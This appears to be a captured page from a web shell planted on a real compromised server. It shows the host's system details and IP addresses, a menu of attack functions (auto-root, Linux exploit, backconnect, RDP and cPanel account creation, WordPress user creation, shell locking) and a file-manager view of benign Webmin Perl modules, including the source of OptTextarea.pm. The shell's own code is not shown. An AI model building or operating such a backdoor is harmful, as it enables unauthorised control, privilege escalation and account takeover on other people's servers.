Linux server.thearyasamaj.org 4.18.0-553.56.1.el8_10.x86_64 #1 SMP Tue Jun 10 05:00:59 EDT 2025 x86_64
Apache
: 103.90.241.146 | : 216.73.216.34
Cant Read [ /etc/named.conf ]
5.6.40
ftpuser@mantra.thearyasamaj.org
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
libexec /
usermin /
WebminUI /
[ HOME SHELL ]
Name
Size
Permission
Action
All.pm
969
B
-rw-r--r--
Button.pm
1.16
KB
-rw-r--r--
Checkbox.pm
1.19
KB
-rw-r--r--
Checkboxes.pm
2.49
KB
-rw-r--r--
Columns.pm
1.43
KB
-rw-r--r--
ConfirmPage.pm
1.14
KB
-rw-r--r--
Date.pm
2.11
KB
-rw-r--r--
DynamicBar.pm
2.35
KB
-rw-r--r--
DynamicHTML.pm
1.16
KB
-rw-r--r--
DynamicText.pm
2.42
KB
-rw-r--r--
DynamicWait.pm
2.49
KB
-rw-r--r--
ErrorPage.pm
565
B
-rw-r--r--
File.pm
1.57
KB
-rw-r--r--
Form.pm
7.94
KB
-rw-r--r--
Group.pm
1.44
KB
-rw-r--r--
Icon.pm
1.09
KB
-rw-r--r--
Input.pm
2.27
KB
-rw-r--r--
InputTable.pm
2.79
KB
-rw-r--r--
JavascriptButton.pm
970
B
-rw-r--r--
LinkTable.pm
6.38
KB
-rw-r--r--
Menu.pm
1.48
KB
-rw-r--r--
Multiline.pm
873
B
-rw-r--r--
OptTextarea.pm
2.85
KB
-rw-r--r--
OptTextbox.pm
1.94
KB
-rw-r--r--
Page.pm
8.41
KB
-rw-r--r--
Password.pm
639
B
-rw-r--r--
PlainText.pm
1.7
KB
-rw-r--r--
Properties.pm
2.6
KB
-rw-r--r--
Radios.pm
1.59
KB
-rw-r--r--
ResultPage.pm
520
B
-rw-r--r--
Section.pm
3.54
KB
-rw-r--r--
Select.pm
2.66
KB
-rw-r--r--
Submit.pm
788
B
-rw-r--r--
Table.pm
15.87
KB
-rw-r--r--
TableAction.pm
1.51
KB
-rw-r--r--
Tabs.pm
2.86
KB
-rw-r--r--
Textarea.pm
2.16
KB
-rw-r--r--
Textbox.pm
1.63
KB
-rw-r--r--
Time.pm
4.12
KB
-rw-r--r--
TitleList.pm
1.51
KB
-rw-r--r--
Upload.pm
1.48
KB
-rw-r--r--
User.pm
1.44
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : OptTextarea.pm
package WebminUI::OptTextarea; use WebminUI::Textarea; use WebminCore; @ISA = ( "WebminUI::Textarea" ); =head2 new WebminUI::OptTextarea(name, value, rows, cols, [default-msg], [other-msg]) Create a text area whose value is optional. =cut sub new { if (defined(&WebminUI::Theme::OptTextarea::new)) { return new WebminUI::Theme::OptTextarea(@_[1..$#_]); } my ($self, $name, $value, $rows, $cols, $default, $other) = @_; $self = new WebminUI::Textarea($name, $value, $rows, $cols); bless($self); $self->set_default($default || $text{'default'}); $self->set_other($other) if ($other); return $self; } =head2 html() Returns the HTML for this optional text input =cut sub html { my ($self) = @_; my $rv; my $name = $self->get_name(); my $value = $self->get_value(); my $dis = $self->get_disabled(); my $rows = $self->get_rows(); my $columns = $self->get_cols(); my $dis1 = &js_disable_inputs([ $name ], [ ]); my $dis2 = &js_disable_inputs([ ], [ $name ]); my $opt1 = $self->get_default(); my $opt2 = $self->get_other(); $rv .= "<input type=radio name=\""."e_escape($name."_def")."\" ". "value=1 ".($value ne '' ? "" : "checked"). ($dis ? " disabled=true" : "")." onClick='$dis1'> ".$opt1."\n"; $rv .= "<input type=radio name=\""."e_escape($name."_def")."\" ". "value=0 ".($value ne '' ? "checked" : ""). ($dis ? " disabled=true" : "")." onClick='$dis2'> ".$opt2."<br>\n"; $rv .= "<textarea name=\""."e_escape($name)."\" ". ($value eq "" || $dis ? " disabled=true" : ""). "rows=$rows columns=$columns>".&html_escape($value)."</textarea>\n"; return $rv; } =head2 validate(&inputs) =cut sub validate { my ($self, $in) = @_; if (defined($self->get_value())) { if ($self->get_value() eq "") { return ( $text{'ui_nothing'} ); } return WebminUI::Textbox::validate($self); } return ( ); } sub set_default { my ($self, $default) = @_; $self->{'default'} = $default; } sub get_default { my ($self) = @_; return $self->{'default'}; } sub set_other { my ($self, $other) = @_; $self->{'other'} = $other; } sub get_other { my ($self) = @_; return $self->{'other'}; } =head2 get_value() Returns the specified initial value for this field, or the value set when the form is re-displayed due to an error. =cut sub get_value { my ($self) = @_; my $in = $self->{'form'} ? $self->{'form'}->{'in'} : undef; if ($in && (defined($in->{$self->{'name'}}) || defined($in->{$self->{'name'}.'_def'}))) { return $in->{$self->{'name'}.'_def'} ? undef : $in->{$self->{'name'}}; } elsif ($in && defined($in->{"ui_value_".$self->{'name'}})) { return $in->{"ui_value_".$self->{'name'}}; } else { return $self->{'value'}; } } =head2 get_input_names() Returns the actual names of all HTML elements that make up this input =cut sub get_input_names { my ($self) = @_; return ( $self->{'name'}, $self->{'name'}."_def[0]", $self->{'name'}."_def[1]" ); } 1;
Close